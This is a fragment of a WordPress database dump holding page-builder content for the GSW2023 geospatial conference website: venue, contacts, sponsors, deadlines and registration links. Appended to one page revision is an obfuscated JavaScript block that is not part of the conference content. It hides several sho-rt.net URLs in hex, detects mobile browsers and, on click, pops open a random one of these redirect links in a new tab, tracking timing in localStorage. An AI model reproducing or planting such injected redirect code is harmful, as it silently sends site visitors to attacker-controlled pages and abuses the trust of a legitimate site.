-webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:19:54','2023-05-17 04:19:54','',3066,'https://gsw2023.com/?p=4507',0,'revision','',0),
(4508,1,'2023-05-17 04:21:42','2023-05-17 04:21:42','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" 